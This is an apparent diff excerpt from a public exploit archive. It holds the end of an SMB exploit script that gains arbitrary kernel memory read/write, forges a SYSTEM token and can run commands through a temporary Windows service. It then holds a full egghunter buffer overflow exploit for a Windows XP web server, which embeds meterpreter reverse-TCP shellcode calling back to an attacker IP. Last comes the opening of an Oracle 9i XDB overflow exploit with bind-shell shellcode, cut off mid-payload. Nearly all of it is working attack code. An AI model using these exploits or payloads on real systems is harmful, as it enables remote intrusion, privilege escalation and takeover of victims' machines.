# - trans1.InData to &trans2. so we can modify trans2 easily
|
||||
conn.send_nt_trans_secondary(mid=info['special_mid'], data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
|
||||
# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
|
||||
# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
|
||||
conn.send_nt_trans_secondary(mid=special_mid, data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# modify trans2.mid
|
||||
info['trans2_mid'] = conn.next_mid()
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
|
||||
return True
|
||||
|
||||
def exploit_fish_barrel(conn, pipe_name, info):
|
||||
# for Windows Vista/2008 and earlier
|
||||
|
||||
tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
|
||||
conn.set_default_tid(tid)
|
||||
# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
|
||||
fid = conn.nt_create_andx(tid, pipe_name)
|
||||
info['fid'] = fid
|
||||
|
||||
if info['os'] == 'WIN7' and 'arch' not in info:
|
||||
# leak_frag_size() can be used against Windows Vista/2008 to determine target architecture
|
||||
info.update(leak_frag_size(conn, tid, fid))
|
||||
|
||||
if 'arch' in info:
|
||||
# add os and arch specific exploit info
|
||||
info.update(OS_ARCH_INFO[info['os']][info['arch']])
|
||||
attempt_list = [ OS_ARCH_INFO[info['os']][info['arch']] ]
|
||||
else:
|
||||
# do not know target architecture
|
||||
# this case is only for Windows 2003
|
||||
# try offset of 64 bit then 32 bit because no target architecture
|
||||
attempt_list = [ OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86'] ]
|
||||
|
||||
# ================================
|
||||
# groom packets
|
||||
# ================================
|
||||
# sum of transaction name, parameters and data length is 0x1000
|
||||
# paramterCount = 0x100-TRANS_NAME_LEN
|
||||
print('Groom packets')
|
||||
trans_param = pack('<HH', info['fid'], 0)
|
||||
for i in range(12):
|
||||
mid = info['fid'] if i == 8 else next_extra_mid()
|
||||
conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)
|
||||
|
||||
# expected transactions alignment
|
||||
#
|
||||
# +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
|
||||
# | mid=mid1 | mid=mid2 | | mid=mid8 | mid=fid | mid=mid9 | mid=mid10 | mid=mid11 |
|
||||
# +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
|
||||
# trans1 trans2
|
||||
|
||||
# ================================
|
||||
# shift transaction Indata ptr with SmbWriteAndX
|
||||
# ================================
|
||||
shift_indata_byte = 0x200
|
||||
conn.do_write_andx_raw_pipe(info['fid'], 'A'*shift_indata_byte)
|
||||
|
||||
# ================================
|
||||
# Dangerous operation: attempt to control one transaction
|
||||
# ================================
|
||||
# Note: POOL_ALIGN value is same as heap alignment value
|
||||
success = False
|
||||
for tinfo in attempt_list:
|
||||
print('attempt controlling next transaction on ' + tinfo['ARCH'])
|
||||
HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE']+HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
|
||||
NEXT_TRANS_OFFSET = 0xf00 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
|
||||
|
||||
# Below operation is dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
|
||||
conn.send_trans_secondary(mid=info['fid'], data='\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# if the overwritten is correct, a modified transaction mid should be special_mid now.
|
||||
# a new transaction with special_mid should be error.
|
||||
recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')
|
||||
if recvPkt.getNTStatus() == 0x10002: # invalid SMB
|
||||
print('success controlling one transaction')
|
||||
success = True
|
||||
if 'arch' not in info:
|
||||
print('Target is '+tinfo['ARCH'])
|
||||
info['arch'] = tinfo['ARCH']
|
||||
info.update(OS_ARCH_INFO[info['os']][info['arch']])
|
||||
break
|
||||
if recvPkt.getNTStatus() != 0:
|
||||
print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
|
||||
|
||||
if not success:
|
||||
print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
|
||||
print('!!! Write to wrong place !!!')
|
||||
print('the target might be crashed')
|
||||
return False
|
||||
|
||||
|
||||
# NSA eternalromance modify transaction RefCount to keep controlled and reuse transaction after leaking info.
|
||||
# This is easy to to but the modified transaction will never be freed. The next exploit attempt might be harder
|
||||
# because of this unfreed memory chunk. I will avoid it.
|
||||
|
||||
# From a picture above, now we can only control trans2 by trans1 data. Also we know only offset of these two
|
||||
# transactions (do not know the address).
|
||||
# After reading memory by modifying and completing trans2, trans2 cannot be used anymore.
|
||||
# To be able to use trans1 after trans2 is gone, we need to modify trans1 to be able to modify itself.
|
||||
# To be able to modify trans1 struct, we need to use trans2 param or data but write backward.
|
||||
# On 32 bit target, we can write to any address if parameter count is 0xffffffff.
|
||||
# On 64 bit target, modifying paramter count is not enough because address size is 64 bit. Because our transactions
|
||||
# are allocated with RtlAllocateHeap(), the HIDWORD of InParameter is always 0. To be able to write backward with offset only,
|
||||
# we also modify HIDWORD of InParameter to 0xffffffff.
|
||||
|
||||
print('modify parameter count to 0xffffffff to be able to write backward')
|
||||
conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
|
||||
# on 64 bit, modify InParameter last 4 bytes to \xff\xff\xff\xff too
|
||||
if info['arch'] == 'x64':
|
||||
conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 0x1000 + HEAP_CHUNK_PAD_SIZE
|
||||
PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN
|
||||
PREV_TRANS_OFFSET = 0x100000000 - PREV_TRANS_DISPLACEMENT
|
||||
|
||||
# modify paramterCount of first transaction
|
||||
conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
|
||||
if info['arch'] == 'x64':
|
||||
conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
|
||||
# restore trans2.InParameters pointer before leaking next transaction
|
||||
conn.send_trans_secondary(mid=info['fid'], data='\x00'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# ================================
|
||||
# leak transaction
|
||||
# ================================
|
||||
print('leak next transaction')
|
||||
# modify TRANSACTION member to leak info
|
||||
# function=5 (NT_TRANS_RENAME)
|
||||
conn.send_trans_secondary(mid=info['fid'], data='\x05', dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_FUNCTION_OFFSET'])
|
||||
# parameterCount, totalParameterCount, maxParameterCount, dataCount, totalDataCount
|
||||
conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 0x100, 0x100), dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_PARAMCNT_OFFSET'])
|
||||
|
||||
conn.send_nt_trans_secondary(mid=special_mid)
|
||||
leakData = conn.recv_transaction_data(special_mid, 0x100)
|
||||
leakData = leakData[4:] # remove param
|
||||
#open('leak.dat', 'wb').write(leakData)
|
||||
|
||||
# check heap chunk size value in leak data
|
||||
if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != (TRANS_CHUNK_SIZE // info['POOL_ALIGN']):
|
||||
print('chunk size is wrong')
|
||||
return False
|
||||
|
||||
# extract leak transaction data and make next transaction to be trans2
|
||||
leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
|
||||
leakTrans = leakData[leakTranOffset:]
|
||||
fmt = info['PTR_FMT']
|
||||
_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+fmt*5, leakTrans, 8)
|
||||
inparam_value, outparam_value, indata_value = unpack_from('<'+fmt*3, leakTrans, info['TRANS_INPARAM_OFFSET'])
|
||||
trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
|
||||
|
||||
print('CONNECTION: 0x{:x}'.format(connection_addr))
|
||||
print('SESSION: 0x{:x}'.format(session_addr))
|
||||
print('FLINK: 0x{:x}'.format(flink_value))
|
||||
print('InData: 0x{:x}'.format(indata_value))
|
||||
print('MID: 0x{:x}'.format(trans2_mid))
|
||||
|
||||
trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN
|
||||
trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2
|
||||
print('TRANS1: 0x{:x}'.format(trans1_addr))
|
||||
print('TRANS2: 0x{:x}'.format(trans2_addr))
|
||||
|
||||
# ================================
|
||||
# modify trans struct to be used for arbitrary read/write
|
||||
# ================================
|
||||
print('modify transaction struct for arbitrary read/write')
|
||||
# modify
|
||||
# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
|
||||
# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
|
||||
# Note: HIDWORD of trans1.InParameter is still 0xffffffff
|
||||
TRANS_OFFSET = 0x100000000 - (info['TRANS_SIZE'] + TRANS_NAME_LEN)
|
||||
conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<'+fmt*3, trans1_addr, trans1_addr+0x200, trans2_addr), paramDisplacement=TRANS_OFFSET+info['TRANS_INPARAM_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# modify trans1.mid
|
||||
trans1_mid = conn.next_mid()
|
||||
conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
info.update({
|
||||
'connection': connection_addr,
|
||||
'session': session_addr,
|
||||
'trans1_mid': trans1_mid,
|
||||
'trans1_addr': trans1_addr,
|
||||
'trans2_mid': trans2_mid,
|
||||
'trans2_addr': trans2_addr,
|
||||
})
|
||||
return True
|
||||
|
||||
def create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr):
|
||||
SID_SYSTEM = pack('<BB5xB'+'I', 1, 1, 5, 18)
|
||||
SID_ADMINISTRATORS = pack('<BB5xB'+'II', 1, 2, 5, 32, 544)
|
||||
SID_AUTHENICATED_USERS = pack('<BB5xB'+'I', 1, 1, 5, 11)
|
||||
SID_EVERYONE = pack('<BB5xB'+'I', 1, 1, 1, 0)
|
||||
# SID_SYSTEM and SID_ADMINISTRATORS must be added
|
||||
sids = [ SID_SYSTEM, SID_ADMINISTRATORS, SID_EVERYONE, SID_AUTHENICATED_USERS ]
|
||||
# - user has no attribute (0)
|
||||
# - 0xe: SE_GROUP_OWNER | SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT
|
||||
# - 0x7: SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_MANDATORY
|
||||
attrs = [ 0, 0xe, 7, 7 ]
|
||||
|
||||
# assume its space is enough for SID_SYSTEM and SID_ADMINISTRATORS (no check)
|
||||
# fake user and groups will be in same buffer of original one
|
||||
# so fake sids size must NOT be bigger than the original sids
|
||||
fakeUserAndGroupCount = min(userAndGroupCount, 4)
|
||||
fakeUserAndGroupsAddr = userAndGroupsAddr
|
||||
|
||||
addr = fakeUserAndGroupsAddr + (fakeUserAndGroupCount * info['PTR_SIZE'] * 2)
|
||||
fakeUserAndGroups = ''
|
||||
for sid, attr in zip(sids[:fakeUserAndGroupCount], attrs[:fakeUserAndGroupCount]):
|
||||
fakeUserAndGroups += pack('<'+info['PTR_FMT']*2, addr, attr)
|
||||
addr += len(sid)
|
||||
fakeUserAndGroups += ''.join(sids[:fakeUserAndGroupCount])
|
||||
|
||||
return fakeUserAndGroupCount, fakeUserAndGroups
|
||||
|
||||
|
||||
def exploit(target, pipe_name):
|
||||
conn = MYSMB(target)
|
||||
|
||||
# set NODELAY to make exploit much faster
|
||||
conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
|
||||
|
||||
info = {}
|
||||
|
||||
conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
|
||||
server_os = conn.get_server_os()
|
||||
print('Target OS: '+server_os)
|
||||
if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
|
||||
info['os'] = 'WIN7'
|
||||
info['method'] = exploit_matched_pairs
|
||||
elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 ") or server_os.startswith("Windows 10"):
|
||||
info['os'] = 'WIN8'
|
||||
info['method'] = exploit_matched_pairs
|
||||
elif server_os.startswith("Windows Server (R) 2008") or server_os.startswith('Windows Vista'):
|
||||
info['os'] = 'WIN7'
|
||||
info['method'] = exploit_fish_barrel
|
||||
elif server_os.startswith("Windows Server 2003 "):
|
||||
info['os'] = 'WIN2K3'
|
||||
info['method'] = exploit_fish_barrel
|
||||
elif server_os.startswith("Windows 5.1"):
|
||||
info['os'] = 'WINXP'
|
||||
info['arch'] = 'x86'
|
||||
info['method'] = exploit_fish_barrel
|
||||
elif server_os.startswith("Windows XP "):
|
||||
info['os'] = 'WINXP'
|
||||
info['arch'] = 'x64'
|
||||
info['method'] = exploit_fish_barrel
|
||||
elif server_os.startswith("Windows 5.0"):
|
||||
info['os'] = 'WIN2K'
|
||||
info['arch'] = 'x86'
|
||||
info['method'] = exploit_fish_barrel
|
||||
else:
|
||||
print('This exploit does not support this target')
|
||||
sys.exit()
|
||||
|
||||
if pipe_name is None:
|
||||
pipe_name = find_named_pipe(conn)
|
||||
if pipe_name is None:
|
||||
print('Not found accessible named pipe')
|
||||
return False
|
||||
print('Using named pipe: '+pipe_name)
|
||||
|
||||
if not info['method'](conn, pipe_name, info):
|
||||
return False
|
||||
|
||||
# Now, read_data() and write_data() can be used for arbitrary read and write.
|
||||
# ================================
|
||||
# Modify this SMB session to be SYSTEM
|
||||
# ================================
|
||||
# Note: Windows XP stores only PCtxtHandle and uses ImpersonateSecurityContext() for impersonation, so this
|
||||
# method does not work on Windows XP. But with arbitrary read/write, code execution is not difficult.
|
||||
fmt = info['PTR_FMT']
|
||||
|
||||
print('make this SMB session to be SYSTEM')
|
||||
# IsNullSession = 0, IsAdmin = 1
|
||||
|
@ -434,30 +846,69 @@ def exploit(target, pipe_name):
|
|||
sessionData = read_data(conn, info, info['session'], 0x100)
|
||||
secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
|
||||
|
||||
# copy SecurityContext for restoration
|
||||
secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
|
||||
if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
|
||||
# Windows 2003 and earlier uses only ImpersonateSecurityContext() (with PCtxtHandle struct) for impersonation
|
||||
# Modifying token seems to be difficult. But writing kernel shellcode for all old Windows versions is
|
||||
# much more difficult because data offset in ETHREAD/EPROCESS is different between service pack.
|
||||
|
||||
# find the token and modify it
|
||||
if 'SECCTX_PCTXTHANDLE_OFFSET' in info:
|
||||
pctxtDataInfo = read_data(conn, info, secCtxAddr+info['SECCTX_PCTXTHANDLE_OFFSET'], 8)
|
||||
pctxtDataAddr = unpack_from('<'+fmt, pctxtDataInfo)[0]
|
||||
else:
|
||||
pctxtDataAddr = secCtxAddr
|
||||
|
||||
print('overwriting session security context')
|
||||
# see FAKE_SECCTX detail at top of the file
|
||||
write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
|
||||
tokenAddrInfo = read_data(conn, info, pctxtDataAddr+info['PCTXTHANDLE_TOKEN_OFFSET'], 8)
|
||||
tokenAddr = unpack_from('<'+fmt, tokenAddrInfo)[0]
|
||||
print('current TOKEN addr: 0x{:x}'.format(tokenAddr))
|
||||
|
||||
# copy Token data for restoration
|
||||
tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
|
||||
|
||||
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
|
||||
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
|
||||
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
|
||||
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
|
||||
|
||||
print('overwriting token UserAndGroups')
|
||||
# modify UserAndGroups info
|
||||
fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
|
||||
if fakeUserAndGroupCount != userAndGroupCount:
|
||||
write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', fakeUserAndGroupCount))
|
||||
write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
|
||||
else:
|
||||
# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
|
||||
# copy SecurityContext for restoration
|
||||
secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
|
||||
|
||||
print('overwriting session security context')
|
||||
# see FAKE_SECCTX detail at top of the file
|
||||
write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
|
||||
|
||||
# ================================
|
||||
# do whatever we want as SYSTEM over this SMB connection
|
||||
# ================================
|
||||
try:
|
||||
smb_pwn(conn)
|
||||
smb_pwn(conn, info['arch'])
|
||||
except:
|
||||
pass
|
||||
|
||||
# restore SecurityContext. If the exploit does not use null session, PCtxtHandle will be leaked.
|
||||
write_data(conn, info, secCtxAddr, secCtxData)
|
||||
# restore SecurityContext/Token
|
||||
if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
|
||||
userAndGroupsOffset = userAndGroupsAddr - tokenAddr
|
||||
write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
|
||||
if fakeUserAndGroupCount != userAndGroupCount:
|
||||
write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', userAndGroupCount))
|
||||
else:
|
||||
write_data(conn, info, secCtxAddr, secCtxData)
|
||||
|
||||
conn.disconnect_tree(tid)
|
||||
conn.disconnect_tree(conn.get_tid())
|
||||
conn.logoff()
|
||||
conn.get_socket().close()
|
||||
return True
|
||||
|
||||
def smb_pwn(conn):
|
||||
|
||||
def smb_pwn(conn, arch):
|
||||
smbConn = conn.get_smbconnection()
|
||||
|
||||
print('creating file c:\\pwned.txt on the target')
|
||||
|
@ -468,12 +919,16 @@ def smb_pwn(conn):
|
|||
|
||||
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
|
||||
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
|
||||
# Note: there are many methods to get shell over SMB admin session
|
||||
# a simple method to get shell (but easily to be detected by AV) is
|
||||
# executing binary generated by "msfvenom -f exe-service ..."
|
||||
|
||||
def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
|
||||
with open(localSrc, 'rb') as fp:
|
||||
smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
|
||||
|
||||
# based on impacket/examples/serviceinstall.py
|
||||
# Note: using Windows Service to execute command same as how psexec works
|
||||
def service_exec(conn, cmd):
|
||||
import random
|
||||
import string
|
||||
|
@ -485,7 +940,7 @@ def service_exec(conn, cmd):
|
|||
rpcsvc = conn.get_dce_rpc('svcctl')
|
||||
rpcsvc.connect()
|
||||
rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
|
||||
svnHandle = None
|
||||
svcHandle = None
|
||||
try:
|
||||
print("Opening SVCManager on %s....." % conn.get_remote_host())
|
||||
resp = scmr.hROpenSCManagerW(rpcsvc)
|
||||
|
@ -494,7 +949,7 @@ def service_exec(conn, cmd):
|
|||
# First we try to open the service in case it exists. If it does, we remove it.
|
||||
try:
|
||||
resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00')
|
||||
except Exception, e:
|
||||
except Exception as e:
|
||||
if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:
|
||||
raise e # Unexpected error
|
||||
else:
|
||||
|
@ -513,15 +968,15 @@ def service_exec(conn, cmd):
|
|||
scmr.hRStartServiceW(rpcsvc, serviceHandle)
|
||||
# is it really need to stop?
|
||||
# using command line always makes starting service fail because SetServiceStatus() does not get called
|
||||
print('Stoping service %s.....' % service_name)
|
||||
scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
|
||||
except Exception, e:
|
||||
#print('Stoping service %s.....' % service_name)
|
||||
#scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
|
||||
except Exception as e:
|
||||
print(str(e))
|
||||
|
||||
print('Removing service %s.....' % service_name)
|
||||
scmr.hRDeleteService(rpcsvc, serviceHandle)
|
||||
scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
|
||||
except Exception, e:
|
||||
except Exception as e:
|
||||
print("ServiceExec Error on: %s" % conn.get_remote_host())
|
||||
print(str(e))
|
||||
finally:
|
||||
|
@ -531,12 +986,12 @@ def service_exec(conn, cmd):
|
|||
rpcsvc.disconnect()
|
||||
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print("{} <ip> <pipe_name>".format(sys.argv[0]))
|
||||
if len(sys.argv) < 2:
|
||||
print("{} <ip> [pipe_name]".format(sys.argv[0]))
|
||||
sys.exit(1)
|
||||
|
||||
target = sys.argv[1]
|
||||
pipe_name = sys.argv[2]
|
||||
pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
|
||||
|
||||
exploit(target, pipe_name)
|
||||
print('Done')
|
89
platforms/windows/remote/42778.py
Executable file
89
platforms/windows/remote/42778.py
Executable file
|
@ -0,0 +1,89 @@
|
|||
# Tested on Windows XP SP3 (x86)
|
||||
# The application requires to have the web server enabled.
|
||||
|
||||
#!/usr/bin/python
|
||||
import socket, threading, struct
|
||||
|
||||
host = "192.168.228.155"
|
||||
port = 80
|
||||
|
||||
def send_egghunter_request():
|
||||
|
||||
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.158 LPORT=443 -f py
|
||||
buf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
|
||||
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
|
||||
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
|
||||
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
|
||||
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
|
||||
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
|
||||
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
|
||||
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
|
||||
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
|
||||
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
|
||||
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
|
||||
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
|
||||
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
|
||||
buf += "\xff\xd5\x6a\x0a\x68\xc0\xa8\xe4\x9e\x68\x02\x00\x01"
|
||||
buf += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
|
||||
buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
|
||||
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
|
||||
buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
|
||||
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
|
||||
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
|
||||
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
|
||||
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
|
||||
buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
|
||||
buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
|
||||
buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
|
||||
buf += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
|
||||
|
||||
egghunter = "W00T" * 2
|
||||
egghunter += "\x90" * 16 # Padding
|
||||
egghunter += buf
|
||||
egghunter += "\x42" * (100000 - len(egghunter))
|
||||
content_length = len(egghunter) + 1000 # Just 1000 padding.
|
||||
|
||||
egghunter_request = "POST / HTTP/1.1\r\n"
|
||||
egghunter_request += "Content-Type: multipart/form-data; boundary=evilBoundary\r\n"
|
||||
egghunter_request += "Content-Length: " + str(content_length) + "\r\n"
|
||||
egghunter_request += "\r\n"
|
||||
egghunter_request += egghunter
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host,port))
|
||||
s.send(egghunter_request)
|
||||
s.recv(1024)
|
||||
s.close()
|
||||
|
||||
def send_exploit_request():
|
||||
|
||||
buffer = "\x90" * 2495
|
||||
buffer += "\xeb\x06\x90\x90" # short jump
|
||||
buffer += struct.pack("<L", 0x1014fdef) # POP ESI; POP EBX; RETN - libspp
|
||||
|
||||
# ./egghunter.rb -b "\x00\x0a\x0b" -e "W00T" -f py
|
||||
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
|
||||
buffer += "\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75"
|
||||
buffer += "\xea\xaf\x75\xe7\xff\xe7"
|
||||
buffer += "\x41" * (6000 - len(buffer))
|
||||
|
||||
#HTTP Request
|
||||
request = "GET /" + buffer + "HTTP/1.1" + "\r\n"
|
||||
request += "Host: " + host + "\r\n"
|
||||
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
|
||||
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
|
||||
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
|
||||
request += "Accept-Encoding: gzip, deflate" + "\r\n"
|
||||
request += "Connection: keep-alive" + "\r\n\r\n"
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host,port))
|
||||
s.send(request)
|
||||
s.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
t = threading.Thread(target=send_egghunter_request)
|
||||
t.start()
|
||||
print "[+] Thread started."
|
||||
send_exploit_request()
|
75
platforms/windows/remote/42780.py
Executable file
75
platforms/windows/remote/42780.py
Executable file
|
@ -0,0 +1,75 @@
|
|||
#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
|
||||
#Date: 09/25/2017
|
||||
#Exploit Author: Charles Dardaman
|
||||
#Twitter: https://twitter.com/CharlesDardaman
|
||||
#Website: http://www.dardaman.com
|
||||
#Version:9.2.0.1
|
||||
#Tested on: Windows 2000 SP4
|
||||
#CVE: 2003-0727
|
||||
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
|
||||
import socket, sys, base64
|
||||
|
||||
#usage ./oracle9i_xbd_pass <target ip> <target port>
|
||||
|
||||
rhost = sys.argv[1] #target ip
|
||||
rport = int(sys.argv[2]) #target port
|
||||
|
||||
#Variables:
|
||||
ret = "\x46\x6d\x61\x60" #0x60616d46 Little endian form
|
||||
nop = "\x90"
|
||||
pre = "\x81\xc4\xff\xef\xff\xff\x44" #This has to be prepended into the shellcode.
|
||||
|
||||
#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_nai
|
||||
#355 bytes
|
||||
payload = ""
|
||||
payload += pre
|
||||
payload += "\xba\x64\xdb\x93\xe7\xda\xd6\xd9\x74\x24\xf4\x58\x29"
|
||||
